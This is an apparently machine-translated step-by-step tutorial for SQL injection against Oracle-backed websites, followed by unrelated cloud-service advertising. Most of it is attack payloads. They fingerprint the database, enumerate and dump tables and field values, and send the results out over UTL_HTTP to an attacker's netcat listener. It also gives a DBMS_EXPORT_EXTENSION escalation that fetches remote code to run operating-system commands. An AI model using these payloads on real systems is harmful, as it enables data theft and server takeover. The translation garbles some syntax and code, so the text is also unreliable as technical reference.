① Determine whether it is an Oralce database:
And 0 <> (select count (*) from dual) returns the normal page, which is represented as an Oracle database.
② Number of fields to be guessed:
Use order by or group by to submit numbers one by one until the error page is displayed.
③ List the number of fields, such as the number of 6 fields
And 1 = 1 null, null from dual-
Because the ORACLE database does not automatically match the data type, and null can match any data type, no error will be reported for submission. Submit it and return the normal page.
To check the data type of the current field, add ''quotation marks before and after null. If the return result is normal, the field is in numeric type. If an error is returned, it may be in numeric type, if it is not a numeric type, it is another type.
For example, the submit Statement: and 1 = 1 union select null, 'null', null, 'null', 'null' from dual-
④ Read the Oracle database version:
Replace the echo number with and 1 = 2 union select 1, (select banner from sys. v _ $ version where rownum = 1), 3, '4', 5, '6' from dual-
⑤ Read the connection username of the current Oracle database:
And 1 = 2 union select 1, (select SYS_CONTEXT ('userenv', 'current _ user') from dual), 3, '4', 5, '6' from dual-
⑥ Read the operating system version of the current website:
And 1 = 2 union select 1, (select member from v $ logfile where rownum = 1), 3, '4', 5, '6' from dual-
7. read Table Name:
And 1 = 2 union select 1, TABLE_NAME, 3, '4', 5, '6' from USER_TABLES-
Description:
And 1 = 2 union select 1, COLUMN_NAME, 3, '4', 5, '6' from COLS where TABLE_NAME = 'name of the table to be exploded '-
When reading the data of the field name in the table:
And 1 = 2 union select 1, NAME, 3, '4', 5, '6' from field NAME-
-----------
⑩ Determine whether the UTL_HTTP package exists:
Select count (*) from all_objects where object_name = 'utl _ http'
Use UTL_HTTP injection:
Use the "and UTL_HTTP.request" ('HTTP: // IP: 2009/'(query statement) = 1-in the local NC listener. local nc-l-vv-p 2009, and then submit
'And UTL_HTTP.request ('HTTP: // IP: 2009/'(select banner from sys. v _ $ version where rownum = 1) = 1-
'And UTL_HTTP.request ('HTTP: // ip: 2009/' (select owner from all_tables where rownum = 1) = 1-the first database is exposed.
'And UTL_HTTP.request ('HTTP: // IP: 2009/' (select owner from all_tables where owner <> 'first database name' and rownum = 1) = 1-
And UTL_HTTP.request ('HTTP: // IP: 2009/'(select owner from all_tables where owner <> 'second database name' and owner <> 'first database name' and rownum = 1) = 1-
Burst table:
'And UTL_HTTP.request ('HTTP: // IP: 2009/' (select TABLE_NAME from all_tables where owner = 'database name' and rownum = 1) = 1-
And UTL_HTTP.request ('HTTP: // IP: 2009/'(select TABLE_NAME from all_tables where owner = 'database name' and rownum = 1 and TABLE_NAME <> 'first table name') = 1-
And UTL_HTTP.request ('HTTP: // IP: 2009/'(select TABLE_NAME from all_tables where owner = 'database name' and rownum = 1 and TABLE_NAME <> 'first table name' and TABLE_NAME <> 'second table name ')) = 1-
Pop-up table:
'And UTL_HTTP.request ('HTTP: // IP: 2009/'(select count (*) from user_tab_columns where table_name = 'table name') = 1-first table column name
Or
'And UTL_HTTP.request ('HTTP: // IP: 2009/' (select * from user_tab_columns where table_name = 'table name' and rownum = 1) = 1-first table column name
And UTL_HTTP.request ('HTTP: // IP: 2009/'(select * from user_tab_columns where table_name = 'table name' and rownum = 1 and COLUMN_NAME <> 'first column name') = 1-
Field Value:
'And UTL_HTTP.request ('HTTP: // IP: 2009/' (select Table segment from table name where rownum = 1) = 1-
'And UTL_HTTP.request ('HTTP: // IP: 2009/'(select Table segment from table name where rownum = 1 and Table segment <> 'first table segment value ')) = 1 -"
Use the SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES function to obtain system permissions:
'And SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES ('foo', bar', DBMS_OUTPUT ". PUT (1); utl_http.request ('HTTP: // www.xx.com/1.txt') END;-', SYS', 0, '1', 0) = 0-
If this page is returned after submission, it cannot be displayed. And SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES (chr (39) chr (70) chr (79), chr (79) chr (39) chr (44), chr (39) chr (66) chr (65) chr (82) chr (39) chr (44) chr (39) chr (68) chr (66) chr (77) chr (883) chr (95) chr (79) chr (85) chr (84) chr (80) chr (85) chr (84) chr (40) chr (58) chr (80) chr (49) chr (41) chr (59) utl_http.request (chr (39) chr (104) chr (116) chr (116) chr (112) chr (58) chr (47) chr (47) chr (119) chr (119) chr (119) chr (46) chr (108) chr (105) chr (45) chr (116) chr (101) chr (107) chr (46) chr (99) chr (111) chr (109) chr (47) chr (49) chr (46) chr (116) chr (120) chr (116) chr (39) chr (69) chr (78) chr (68) chr (59) chr (45) chr (45) chr (39), chr (39) chr (83) chr (89) chr (83) chr (39), 0, chr (39) chr (49) chr (39), 0) = 0-
The content of the remote address 1.txt is: execute immediate 'declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate "create or replace and resolve java source named" JAVACMD "AS import java. lang. *; import java. io. *; public class JAVACMD {public static void execCommand (String command) throws IOException extends runtime.getruntime(cmd.exe c (command) ;}; "; END ;'
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
